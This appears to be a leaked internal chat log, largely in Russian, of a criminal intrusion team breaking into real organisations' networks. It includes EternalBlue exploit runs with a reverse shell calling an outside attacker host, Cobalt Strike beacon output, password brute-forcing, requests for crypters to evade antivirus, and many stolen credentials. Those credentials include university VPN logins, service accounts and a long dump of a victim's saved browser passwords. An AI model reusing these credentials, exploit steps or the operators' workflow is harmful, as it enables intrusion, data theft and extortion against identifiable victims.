C:\Users\user>ping -n 1 CHEECH.evo.local Pinging CHEECH.evo.local [172.17.70.16] with 32 bytes of data: Reply from 172.17.70.16: bytes=32 time=66ms TTL=126 Ping statistics for 172.17.70.16: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 66ms, Maximum = 66ms, Average = 66ms ``сейчас буду проверятьБез измененийPing request could not find host HQ-DC-2.evo.local. Please check the name and try again.а дк доступен?странно...Windows Server 2008пользовательские?На машины на которых шарилсяВОзможно vpn отвалился Ping request could not find host BI-SANDBOX.evo.local. Please check the name and try again.да нет креды естьа они нужны?Под пользаком без прав+есть?ps commandя ждудавай нагрузкусамому интересноэто как так?у меня realtime prot включился сам))доступенneteric.comи нагрузку сразу если окя пиганудомен только дайдаps command подойдет?и нагрузкадомендана дедике?повислаи под сесией идется в азурпо моему у него дампается фв азур другой типок ходитEVO\bplehal ``` https://apps.sematext.com/ui/monitoring/19585/solrCloudOverviewReportPage https://portal.azure.com/#@evo.com/resource/subscriptions/eaa8f156-823c-4beb-91bb-bd6703f0c0e6/resourceGroups/www-production/providers/microsoft.insights/components/evodotcom/overview Можно попробовать под кредами да http://evosolr.southcentralus.cloudapp.azure.com/solr/#/~cloud ```уже) спасибо)это надо у @user3 спрашиватьпривет, а напомни ссылку наш форум пожалуйстата оффа во входной же кобе была ещё одна сессия с этого домена, кто то её отрабатывал, закрепа нет?этот пользак только в трастах пусто?мб в этом дело... угу((``` 'nbtstat' is not recognized as an internal or external command, operable program or batch file. ``nbtstat не помогнет, я могу ошибаться какие то шз я брал из портскана. И так, брал хост нам делал пинг и по 24-й на 445 их в скан. 
Выходит что в теории он может быть с другого домена.то хостнейм ты и так знаешьесли он взят из ад_комп текущегоэээ стоп не понимаюне возвращает хост намеОн с текушего домена взят из ад_комп.только в рамках одного доменакроссдоменная авторизация так не сработаетя про хост который атакуем1 мин+а он точно от этого домена?+yesа креды валидные?`` msf6 exploit(windows/smb/ms17_010_psexec) > options Module options (exploit/windows/smb/ms17_010_psexec): Name Current Setting Required Description ---- --------------- -------- ----------- DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS 10.7.0.73 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain CORP.TELEVISA.COM.MX no The Windows domain to use for authentication SMBPass R8WTksIOle1rP8)P no The password for the specified username SMBUser Hgutierreze no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 23.106.160.50 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 23.106.160.50:4444 [*] 10.7.0.73:445 - Authenticating to 10.7.0.73 as user 'Hgutierreze'... 
[-] 10.7.0.73:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE (Command=115 WordCount=0) [Exploit completed, but no session was created. msf6 exploit(windows/smb/ms17_010_psexec) > ``пару минлюбые валидные доменныену типаКлиренс?это когда кред не хватает`` [-] 10.7.0.73:445 - Unable to find accessible named pipe! ``доменные любые добавьнета креды в опциях есть? msf6 exploit(windows/smb/ms17_010_psexec) > run [*] Started reverse TCP handler on 23.106.160.50:4444 [*] 10.7.0.73:445 - Target OS: Windows Server 2008 R2 Enterprise 7600 [-] 10.7.0.73:445 - Unable to find accessible named pipe! [*] Exploit completed, but no session was created. ``вроде умеешь... ты же тцп_бинд вроде юзал уже...умешь так ?и забиндиться через пайпкароч смотри ты можешь запустить там стейджлесс пейлоадне отрабатывает как? не пускает сессию? или ошибка?Все проверилне отрабатывает)да вероятноexploit/windows/smb/ms17_010_psexecне вижу у него такого. Этот может admin/smb/ms17_010_command но он не отрабатывает и по моему может это exploit/windows/smb/ms17_010_psexecпосмотри в опцияхчерез этернал блу?ага смотри... там вроде модуль умеет запускать ехе через этот сплойт?нета _command пашет?`` [*] 10.7.0.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.7.0.73:445 - Host is likely VULNERABLE to MS17-010 - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit) [*] 10.7.0.73:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.7.0.73:445 - Connecting to target for exploitation. [+] 10.7.0.73:445 - Connection established for exploitation. 
```text
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.7.0.73:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020  65 20 37 36 30 30                                e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 12 Groom Allocations.
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet
[*] 10.7.0.73:445 - Starting non-paged pool grooming
[*] 10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[*] 10.7.0.73:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.7.0.73:4444
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.7.0.73:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020  65 20 37 36 30 30                                e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 17 Groom Allocations.
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet
[*] 10.7.0.73:445 - Starting non-paged pool grooming
[*] 10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[*] 10.7.0.73:445 - Triggering free of corrupted buffer.
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.7.0.73:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020  65 20 37 36 30 30                                e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 22 Groom Allocations.
[*] 10.7.0.73:445 - Sending all but last fragment of exploit packet
[*] 10.7.0.73:445 - Starting non-paged pool grooming
[*] 10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[*] 10.7.0.73:445 - Triggering free of corrupted buffer.
```
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-= [-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] Exploit completed, but no session was created. ``и какая ось?а первый вопрос?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Y64nWyXyE2kdkcJyf) хзтачка видит инет?сканнер говорит что уязвима?нашел 1710 но проэксплуатировать не удается.пока ничего, пробуем другие методы, на этих 2-х тячках вообще ничего не сделатьтак тут у нас что?хмОн первые два раза не снимал, а потом снял. ХЗ может я криво сохранил, но точно знаю что переснимал был оборванили как там эта хуйня называетсяget-computersснять через пш командлетомесли ад файнд не снимает полностьюне тупиad_find.exeCMDНет через смдя говорю снять ад пшты о чем?)Нет, через cmdчерез пш?Хуйня какая тоВижу, я же его два раза переснимал.ты же в курсе что он не полный?который ты скинул?69 по ad_computers`` ASPDC4$ ASPDC5$ ASPDPM2$ CFSQL2$ CFSQLTEST1$ CFWEB1$ CFWEBTEST1$ WIN7_VM$ sccmservice1$ ASPDPM3$ ASPVCS1$ WIN7VDI-PC$ BOBM$ BBCTX3$ BBCTX2 BBCTX4$ BBCTX1$ BBGW3$ ASPUTIL2$ ASPXA3$ BBGW1 FCCTX3$ CFCTX2$ WMLXA1$ ASPXA1$ XENAPP76$ ASPXA7$ XENAPP71-2 ASPXA9$ CFHV1 BBCTX6 ASPXA5$ ASPFS1 BBCTX5 BBCTX7 ASPSQL2 ASPXA6$ BBCTX8 ASPXA4$ CFXA1$ ASPXA2$ ASPXA10$ ASPXA8$ XENAPP71 RCMTESTTS$ ASPSAN2012$ RCM2012$ ASPUTIL3$ NTIXA1$ NTIGSS1 NTISAGE1$ NTISAGE2$ ASPXA11$ PHXADC1$ PHXA-1$ ASPXA65TEMPLATE$ XENAPP76PILOT$ USCXA1$ USCFS1$ ASPSYM1$ KOMIGTEST2008R2$ DRUTIL01$ ASPDC3$ MVEXA1$ DMGXA1$ MVEFS1$ NTIW71$ EGMANAGER$ EGCOLLECTOR$ ``сколько всего пк было?С того он не работает так долго .с чего ты взял?оно все позависалонетинвок шар закончил?В ситриксдля aspsql2svc There are no resources currently available for this user.Админ залочил`` Your credentials are invalid. Try again or contact your system administrator. 
```Ранее не замечал тако его всегда юзаемпалится скрипт?В него передается список хостов это автобрут, не смбЛогинсписок хостов?даlfпоследняя команда?бррпочему не работает?https://github.com/leaderimStalin/psbrau/blob/main/Invoke-SMBAutoBrute.ps1что за автобрут?автоБрут по ходу не работает в тпшмб где админ будетладно смотри смбшары под 2 пользакамипару мину этого`` C:\Windows\system32 BBCTX5 @ MAPCIASP\aspsql2svc ``нет юзер пользака под которым сессияда етп)[ ](https://mediaeveryone.com/group/mapciasp-com?msg=bctF5N752KHAooiC4) ?net useчто этодай нет юзерЯ знаю)так она на текущем хосте)`` C:\Windows\system32 BBCTX5 @ MAPCIASP\aspsql2svc ```сесия в тпш есть под ними`` Но под этими кредами могу запускать cmd and ps ```такnfrты же говоришь access denied?где запускать и как?Но под этими кредами могу запускать cmd and psДоступ закрытLjcneg pfrhsnкакая ошибка?По разному, wmic, ViewSQLкак пробуешь, что не подключает?Чего не понимаешь? С этими кредами не подключитесь к серверу ASPSQL2.mapciasp.com. Под этими кредам и не запустить нагрузку. Эти креды = user:aspsql2svc pwd:map#2013я чего то не понимаю`` Не подключиться с кредами на ASPSQL2.mapciasp.com, через wmic не посмотреть дериктории ``Не подключиться с кредами на ASPSQL2.mapciasp.com, через wmic не посмоть дериктории. Удалось запустить под кредами poewershell. 
От aspsql2svc пробовал запускать нагрузку, ничего.да?Это pwd: map#2013:thumbsup:будем разбирать новый инструмент и метод[ ](https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?всем придется читать и вникатьпо крайней мере будет обновление процесадавсе будем?можете заканчивать с текущими задачами и плавно переходим к #sisd-netнеав птш нет возможности запускать файлы шарповские из памяти?я вам собираю под х64 дл+все собираете с чеком?давай файлик шелкодаДелки палятьсянеадавайа кобальта нового нет?был самый чистый из последнихllvm могу собратьКриптор чистый есть?через полчаса будет собрание и все обсудимначнем закрыватьчерез час[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) чето молчит деп(ок, сейчас попробуюsql management студия?скорее всего будем брать в 3-4 кобыу депа соберите себе нагрузки чистые на каждую личную кобуготов билдче с билдом?[ ](https://mediaeveryone.com/channel/general?msg=poH4tpKdX3YgrcJoR) взял[ ](https://mediaeveryone.com/channel/general?msg=myX45efB6jTFRGsgG) ``` https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!! ``` @user7`` https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219 ``` @user3проверь, она у тебя в работе была`` https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074! ``` @user8 еще доступыесть замена ?@tl1 есть еще че?Your credentials are invalid. Try again or contact your system administrator. https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears ``` @user3 заменаугу, значит чисто`` Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist. ``да, донастраиваю компесли после выполнения команды выше получили ошибку, можно проверить стандартный путь ручками ``` dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine ```т е ты щас без работы сидишь?И еще раз, я тебе отписывался по каждой из двух которые ты давал. По одной в конфе по второй в общем. 
В одной даные залочили, во второй нет возможности запустить cmd`` Get-PSReadLineOption ``` последний раз скидываю, запишите ужетут доступы сдохли и сеть умерла?`` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx ``` у меня на тебя открыта эта сетьты писал в #general или в конфу?окПереустановкой OS на компе. Облять вырубился и не видел разделыв #general?так чем ты занят был?Я тебе по каждой отписывался!`` https://paloca.cernerworks.com/citrix/prodweb/ `````` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx `````` https://paloca.cernerworks.com/citrix/prodweb/ ``вчера с каждым по сеткам проходили, что у кого в работе[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) Какие?[ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) что значит вчера пропустил?все умерли?ты чем вобще занят? у меня на тебя 2 сетки записаносоздаля тебя вчера пропустил?естьМужик ты прикалываешься? Я тебе вчера написал что залочины даныепотом создамсначала ад сними толькодаможно конфу[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) работайты отписал норм, у тебя пошел прогресс по сетке или что?в трете посмотривсё есть сессия домен `stg-healthcare.com`От куда?@tl1 На какой?@user3 еще мне ответил на вопрося понялокей[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) спросить про нагрузкуну как по мне если думать дальше логически от твоего предложенияпро нагрузку откуда мне знатьможет подсказатьок он работает с тпш>по всем вопросам работы к stalinя тебя отсылал к @user3 что он давно с ним работаетда и вы в одном местев этой конфе уже встречалась инфа об этомне вообще откуда знать, что то ещё в тпш мне выжеть нагрузку?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) я уже ответилв #general все сидяту 2х человек помимо меня был доступ тудавас 5 человек в одном месте[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) м?и ничего не получилесли я отписывал об 
этом еще вчераи я вижу что ты выбрали ждать 4 часавыбор спросить у коллегв кобу притянул или ла/да получил?у меня был выбор?норм в чем?4 часа просто сидел?я её ещё вчера ждал@user8 чем занят был последние 4 часа? ждал нагрузку?да тут мыникто не смог 2 кнопки нажать и нагрузку коллеге выдать?я и @user8 ?сколько человек в команде?Что точней?>мне нужна команда для спавна в тпш для сетки tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) то есть команду в тпш можно?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) а точнее?у меня то же и писал в чате роут пытаюсь сделать,чтобы не умирал, portfwd не хочет работатьНормили билд ужеа че команду на тпш можно?как у вас дела?:v:не за чтоспасибоZe8ZW53FztpsVFTюзер3а пароль не помнитсвой - какой?свой, он систему переставилон логин какой вводит?@tl1 сталин в рокете не может авторизоваться, скиньте парольбудет сегоднябилд будет?а рокет лежалну и не мог в любом случае зайти по рдп, тк доступ в рокете лежитдля тпшлично я командуожидаем чего?ожиданием, получается мне нужна команда для спавна в тпш для сетки `tcph.stg-healthcare.com`чем сейчас заняты?hiвсем приветнет, у нас тожепривет, у меня одного лежал рокет?тут. привету?спались кажетсяпинганул сначала с ДК, потом с тачки админа, везде 100% лосс друго сегмента сети видно?ок, тогда его пропущу, посмотрю что на других адресахполучатеся даотрубили?`` Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 02:36:56> shell ping 192.168.100.247 -n 1 [*] Tasked beacon to run: ping 192.168.100.247 -n 1 [+] host called home, sent: 68 bytes [+] received output: Pinging 192.168.100.247 with 32 bytes of data: Request timed out. Ping statistics for 192.168.100.247: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), ``` понятно (даже не дает зайти`` The connection has timed out The server at 192.168.100.247 is taking too long to respond. The site could be temporarily unavailable or too busy. Try again in a few moments. 
If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web. ```172.93.105.2:18541дай сокси с дк под токено и с тачки владельцадиски видны снаружи?а сокс с тачки владельца?такая же хреньсейчас попробую с другой проксис другого места кидали?дргугие сылки то открываеттак прокся отпала не?в консоли пустоскинешь что тамвкладка консоль и нетворкоткрой отладчик в браузерефреш?и страница грузитсяна секунду показывает что зашло и потом белый экрана вырубает то что?прокся не падаетпрокся падает?и долго грузитсятолько нажимаю войти как сразу вырубает[ ](https://mediaeveryone.com/group/waterway-com?msg=wqSewELvNyiwWnvd2) неачто внутри?что интересноетак`http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!`@tl1 @tl2`WATERWAY\mharper LoveUnit14*`ещё не закончили, сейчас всё перепроверим что с браузеров поснимали и двинем дальше`MACMINI-EDC269`имя хоста какое? не тайммашин случаем[ ](https://mediaeveryone.com/group/waterway-com?msg=7TsNZAcfpHzmPd98t) внц порт открытеще не закончили?`192.168.6.160\posserver01\PPXMLData L00k4MyD@ta`Carbonite BackupMac ``` 192.168.0.233:5900 192.168.0.233:3283 192.168.0.233:88 192.168.0.233:22 (SSH-2.0-OpenSSH_8.1) 192.168.0.233:445 ````\WWSQL\S$\SQLBackup``\WW2K1\F$\Data\AKPRO_Data\BACKUPS``\WW2K1\F$\Backup``\WW2K1\Data\AKPRO_Data\BACKUPS```` ````\\REPORTING\D$\SQLBackup`мб я помню только что тут 2 есхи былосолар бэкапит куда то в вг?что солар?мб солар?збсно востановили там сеть чуть не в один кликребята которые делали пропустили чето очеьн важное, я сам не в курсе до конца что именноага там был фул ресторБля... 
LOL
@tl1 @tl2
```
C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe
```
They have bitdefender here
```
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://designcloud.mockflow.com/,https://designcloud.mockflow.com/,1/19/2017 12:11:15 PM,13129323075436512,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.microsoftonline.com/,https://login.microsoftonline.com/common/oauth2/authorize,1/20/2017 8:36:53 AM,13129396613038827,gkeller@waterway.com,W
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.google.com/,https://accounts.google.com/ServiceLogin,2/16/2017 2:48:17 PM,13131751697642844,waterwaytesting@gmail.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.hotschedules.com/,https://www.hotschedules.com/hs/login.jsp,2/28/2017 2:01:56 PM,13132785716990422,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:20 AM,13134500840455937,admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.showmecables.com/,https://www.showmecables.com/customer/account/login/,4/17/2017 11:16:04 AM,13136919364519382,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://securetest.i9.talx.com/,https://securetest.i9.talx.com/I9ExpressCT2/PostAuthenticated/EmployerReview.ascx,8/28/2017 1:23:59 PM,13148418239868206,,12344321 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login5.silverpop.com/,https://login5.silverpop.com/login,1/27/2017 10:17:28 AM,13130007448689450,transact@waterway.com,Waterway!999 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,GKoct2020! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sandbox.authorize.net/,https://sandbox.authorize.net/UI/themes/anet/logon.aspx,3/3/2017 1:32:50 PM,13133043170642560,gkeller727,GKoct2020! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.pingboard.com/,https://waterway.pingboard.com/invitation/accept,1/22/2018 2:49:00 PM,13161127740422083,gkeller@waterway.com,GKoct2015! 
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.authorize.net/,https://login.authorize.net/,7/21/2018 8:03:37 AM,13176651817834997,gkeller727,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://id.atlassian.com/,https://id.atlassian.com/signup/invite,11/15/2017 9:45:06 AM,13155234306572101,gkeller@waterway.com,GKoct2015! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sso-prod.insite360.gilbarco.com/,https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate,1/19/2017 9:11:07 AM,13129312267171112,gkeller@waterway.com,GKoct2015! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://invitations.microsoft.com/,https://invitations.microsoft.com/signup,9/24/2018 1:18:57 PM,13182286737852274,gkeller@waterway.com,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://pdiconnections.force.com/,https://pdiconnections.force.com/pdiconnections/Login,8/4/2017 8:50:19 AM,13146328219423516,gkeller@waterway.com,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://pdiprodweb/,http://pdiprodweb/FocalPoint/Login.aspx,1/26/2018 9:18:55 AM,13161453535823207,waterway\gkeller,GKoct2015! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/pro_users/login,1/18/2017 6:03:47 PM,13129257827373174,gkeller@waterway.com,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://github.com/,https://github.com/session,1/18/2017 6:28:21 PM,13129259301326003,gkellerww,GKoct2015! 
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://smartscan.controlscan.com/,https://smartscan.controlscan.com/security/index/0/overview,1/3/2019 2:56:52 PM,13191022612362998,650000010503764,u7i2jwPWZdfCwcU C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://auth.monday.com/,https://auth.monday.com/users/invitation/accept,12/31/1600 6:00:00 PM,0,Greg Keller,kJHA2x9qfXmFM6U C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterwaytraining.litmos.com/,https://waterwaytraining.litmos.com/account/Login,2/25/2019 3:37:37 PM,13195604257652268,gkeller@waterway.com,Waterway99 C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://waterway.zendesk.com/,https://waterway.zendesk.com/auth/v2/login/email_verification,3/30/2019 8:15:40 AM,13198425340398832,gkeller@waterway.com,GKoct2015! C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://atlas.technologypartners.net/,https://atlas.technologypartners.net/jira/login.jsp,4/18/2019 10:08:50 AM,13200073730330373,mharper,.V)59n-UW4#Y{6bY C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://itprograms/,http://itprograms/,2/17/2017 11:09:05 AM,13131824945466325,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://ww5.autotask.net/,https://ww5.autotask.net/,9/11/2017 1:48:39 PM,13149629319827394,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://authentication.logmeininc.com/,https://authentication.logmeininc.com/,11/2/2017 10:23:35 AM,13154109815128559,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.zoho.com/,https://accounts.zoho.com/,7/5/2018 3:02:43 PM,13175294563791286,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login 
Data,http://ntwkmtrpc/,http://ntwkmtrpc/,10/19/2017 11:09:13 AM,13152902953441972,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://wwsql01/,http://wwsql01/,1/8/2018 12:59:19 PM,13159911559498999,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.paycomonline.net/,https://www.paycomonline.net/,3/15/2018 11:38:53 AM,13165605533722509,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://mail.datotel.com/,https://mail.datotel.com/,5/23/2018 1:50:56 PM,13171575056275769,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.nationalcar.com/,https://www.nationalcar.com/,6/15/2017 10:55:12 AM,13142015712132139,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://gkeller.waterway.com:8080/,http://gkeller.waterway.com:8080/,10/24/2017 12:05:56 PM,13153338356438715,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://localhost:8080/,http://localhost:8080/,2/17/2017 11:39:28 AM,13131826768206820,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://sa.dor.mo.gov/,https://sa.dor.mo.gov/,3/7/2017 8:33:07 AM,131333707864092,, C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login 